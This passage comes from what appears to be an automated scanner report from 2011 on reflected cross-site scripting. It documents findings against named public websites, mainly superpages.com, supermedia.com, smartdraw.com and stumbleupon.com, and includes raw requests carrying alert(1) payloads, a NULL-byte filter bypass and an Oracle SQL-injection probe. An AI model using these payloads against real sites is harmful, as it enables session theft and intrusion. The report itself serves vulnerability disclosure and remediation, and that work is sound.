Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /x222d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xxiaal45scvt05rw0scrir55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8704
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x222d4c3"style="x:expression(alert(1))"a464241924e/" rel="nofollow" target="_blank">
...[SNIP]...

3.220. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ce3"style="x:expression(alert(1))"57e4b8b7737 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /x22?73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4rkbbezripwlcr04310bhix; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8725
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x22/?73ce3"style="x:expression(alert(1))"57e4b8b7737=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.221. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db50c"style%3d"x%3aexpression(alert(1))"751e53b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db50c"style="x:expression(alert(1))"751e53b85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /x22?db50c"style%3d"x%3aexpression(alert(1))"751e53b85e=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:39 GMT
Content-Length: 8718
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=f0nhyr451wf2n5ul5fkcv5fi; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/x22/?db50c"style="x:expression(alert(1))"751e53b85e=1" rel="nofollow" target="_blank">
...[SNIP]...

3.222. http://www.stumbleupon.com/submit [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae was submitted in the url parameter. This input was echoed as 4c0ad"style="x:expression(alert(1))"f42279855ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j84c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae&title=Magadheera+SmartDesis.TK.mp4 HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=974qehta1h4k26lmf15gse6pi7; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=12468690794d4b1cfaee50a2.12040146; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:24:10 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=1a24d7caf7602edb84b771b2d98b4b47%7C%7C10%7C%7C1296768250%7C003b4cc581adee0f1d9ec8caa710ca6d; expires=Sun, 31-Jan-2021 21:24:10 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49230
Date: Thu, 03 Feb 2011 21:24:11 GMT
X-Varnish: 508021037
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j84c0ad"style="x:expression(alert(1))"f42279855ae" />
...[SNIP]...

3.223. https://www.supermedia.com/spportal/spportalFlow.do ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the '"--></style></script><script>alert(0x000043)</script> request parameter is copied into the HTML document as plain text between tags. The payload 8e1ef<script>alert(1)</script>559c076520b was submitted in the '"--></style></script><script>alert(0x000043)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script>8e1ef<script>alert(1)</script>559c076520b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
</script>8e1ef<script>alert(1)</script>559c076520b' ->
...[SNIP]...

3.224. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00354d0"%3bbf98880f27f was submitted in the _flowExecutionKey parameter. This input was echoed as 354d0";bf98880f27f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27%00354d0"%3bbf98880f27f HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761712|check#true#1296759912; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20354


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
op7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'.354d0";bf98880f27f', the expected format is '_c<conversationId>
...[SNIP]...

3.225. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00e6"%3balert(1)//a43b114193b was submitted in the _flowExecutionKey parameter. This input was echoed as b00e6";alert(1)//a43b114193b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=b00e6"%3balert(1)//a43b114193b HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761536|check#true#1296759736; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:05:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
;
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key 'b00e6";alert(1)//a43b114193b', the expected format is '_c<conversationId>
...[SNIP]...

3.226. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5103"%3bb8f83f9f764 was submitted in the _flowId parameter. This input was echoed as a5103";b8f83f9f764 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow%00a5103"%3bb8f83f9f764 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:47:13 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
r="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id 'loginact-flow.a5103";b8f83f9f764' found; the flows available are: array<String>
...[SNIP]...

3.227. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39e64"%3balert(1)//5b99acdfcf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39e64";alert(1)//5b99acdfcf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script>&39e64"%3balert(1)//5b99acdfcf8=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
nable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map['39e64";alert(1)//5b99acdfcf8' ->
...[SNIP]...

3.228. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631c1"><script>alert(1)</script>026bbe791e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?631c1"><script>alert(1)</script>026bbe791e4=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:52 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:52 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&631c1"><script>alert(1)</script>026bbe791e4=1" rel="stylesheet" />
...[SNIP]...

3.229. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f46'-alert(1)-'8e1de3e7335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a8f46'-alert(1)-'8e1de3e7335=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:54 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a8f46'-alert(1)-'8e1de3e7335=1" rel="nofollow">
...[SNIP]...

3.230. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd053--><script>alert(1)</script>e1950324e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?bd053--><script>alert(1)</script>e1950324e3f=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:59 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:59 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&bd053--><script>alert(1)</script>e1950324e3f=1#" rel="nofollow">
...[SNIP]...

3.231. http://www.superpages.com/inc/social/soc.php [cg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48986"%3balert(1)//3db88e4ace3 was submitted in the cg parameter. This input was echoed as 48986";alert(1)//3db88e4ace3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,948986"%3balert(1)//3db88e4ace3&ml=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.superpages.com

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:34:13 GMT;path=/

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...
<a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=948986";alert(1)//3db88e4ace3&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\">
...[SNIP]...

